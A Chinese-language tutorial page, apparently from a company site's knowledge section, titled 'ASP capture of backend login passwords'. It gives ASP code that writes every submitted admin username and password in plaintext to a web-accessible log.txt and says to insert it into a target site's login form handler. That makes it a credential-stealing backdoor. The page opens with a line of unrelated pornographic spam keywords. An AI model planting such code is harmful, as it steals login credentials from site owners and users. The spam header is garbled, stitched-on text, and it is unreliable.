欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

知識(shí)學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁(yè) > 知識(shí)學(xué)堂 > 常見技術(shù)問題
asp截獲后臺(tái)登錄密碼
更新時(shí)間:2012-04-24 | 發(fā)布人:本站 | 點(diǎn)擊率:442
通過(guò)修改后臺(tái)登陸代碼獲得目標(biāo)網(wǎng)站的用戶登錄密碼。
 
 
 
具體代碼:
 
set fso=server.createobject("scripting.filesystemobject")
  
if fso.FileExists(server.mappath("log.txt"))=true then
 
     set fin=fso.OpenTextFile(server.mappath("log.txt"))
 
 
    temp=fin.readall
 
 
    fin.close  
 
    set fin=nothing
 
  
 
end if
 
set fout=fso.createtextfile(server.mappath("log.txt"))
 
 
fout.WriteLine(temp&"user:"&username&"¦pwd:"&password&"¦time:"&now()&"")
fout.close
set fout=nothing
 
set fso=nothing
 
 
 
 
在后臺(tái)登錄處表單提交的地方插入
 
作者 樂樂's Blog